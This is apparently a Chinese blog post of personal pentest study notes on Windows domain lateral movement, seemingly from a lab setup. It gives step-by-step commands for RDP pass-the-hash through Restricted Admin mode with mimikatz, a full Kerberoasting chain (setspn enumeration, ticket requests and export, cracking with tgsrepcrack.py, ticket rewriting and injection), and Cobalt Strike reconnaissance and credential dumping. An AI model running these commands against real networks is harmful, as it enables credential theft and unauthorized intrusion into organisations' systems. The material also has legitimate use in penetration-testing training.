这篇文章上次修改于 185 天前,可能其部分内容已经发生变化,如有疑问可询问作者。

域横向RDP
RDP明文密码链接
windows: mstsc
mstsc.exe /console /v:192.168.3.21 然后会弹出来那个命令行界面
linux: rdesktop 192.168.3.21:3389

RDP密文HASH链接
windows Server需要开启 Restricted Admin mode,在Windows 8.1和Windows Server 2012 R2中默认开启,
同时如果Win 7 和Windows Server 2008 R2安装了2871997、2973351补丁也支持;

开启命令:
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f

开启后运行:
mstsc.exe /restrictedadmin
mimikatz.exe
privilege::debug
sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7 "/run:mstsc.exe /restrictedadmin"
这个RDP的hash连接比较鸡肋,因为要在对面开启命令,然后mimikatz获取ntml才可以

域横向移动SPN服务

探针,请求,导出,破解,重写
可以过防火墙,能探测sql数据库的密码,但是要注意是否允许外连
不过也只是sql的普通用户,sql管理员不在这
所以感觉还是挺鸡肋的

1探针

setspn -q */*
setspn -q */* | findstr "MSSQL"

2请求票据

删除缓存票据
klist purge
下面两个请求任选其一
powershell请求
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "xxxx"

mimikatz请求
mimikatz.exe "kerberos::ask /target:xxxx"
这些是探针探出来的,直接复制一行来代替用来代替xxxx
QQ截图20211107155230.jpg
查看票据
klist

3导出票据

mimikatz
mimikatz.exe "kerberos::list /export"

4破解票据

破解工具tgsrepcrack.py python3环境运行
python tgsrepcrack.py passwd.txt xxxx.kirbi
python3 .\tgsrepcrack.py .\password.txt .\1-40a00000-jerry@MSSQLSvc~Srv-DB-0day.0day.org~1433-0DAY.ORG.kirbi

5重写票据

重写不一定成功,主要是为了要第四步的破解密码
python kerberoast.py -p Password123 -r xxxx.kirbi -w PENTESTLAB.kirbi -u 500
python kerberoast.py -p Password123 -r xxxx.kirbi -w PENTESTLAB.kirbi -g 512
mimikatz.exe kerberos::ptt xxxx.kirbi # 将生成的票据注入内存

6利用

dir //xxx.xxx.xxx.xxx/c$

域横向移动测试流程一把梭哈-CobaltStrike初体验

简单配置,配置好了以后就直接可以上手了,反正是中文,随便搞
QQ截图20211108000737.jpg
QQ截图20211108000935.jpg
QQ截图20211108001023.jpg
载入脚本,但要注意它这个是用的绝对路径去加载的,然后的话不能移动位置,所以插件和CS最好放在一起
QQ截图20211108001824.jpg
QQ截图20211108075023.jpg
在cs的cmd下执行
net view 探索网络架构
net computers 同样探索网络架构
net dclist 获取域控地址
net user 获取当前存在用户
net +tab然后就会一直补全命令,不停替换
shell net user /domain 意思就是说用shell来执行,这个net user /domain不是cs自带的命令,所以可以通过获取主机上的shell来执行这个探索域内成员的命令
还集成了mimikatz,在抓取密码那个位置,但也有可能会因为权限不够而GG
然后在视图-->密码凭证这里可以看到我们mimikatz分析出来的密码
视图-->目标列表这个地方可以看到探测出来的目标
QQ截图20211108082706.jpg
QQ截图20211108083000.jpg
QQ截图20211108083139.jpg
QQ截图20211108084430.jpg
信息收集:mimiktz+net view
QQ截图20211108090616.jpg
推荐Sumatra PDF阅读器,简洁,不花里胡哨,导入就生成目录,和看书一样
WPS我找了半天找不到查看目录的方式(视图-->???,视图我就找不到),倒是会员弹窗一堆
QQ截图20211108091845.jpg

screen

yum install screen
screen -R cs 然后就会创建一个名叫cs的screen线程,xshell也会直接进到里面去
在这个终端中执行cs服务器
然后ctrl+a+d退出这个终端
想要进入的话就screen -R cs就ok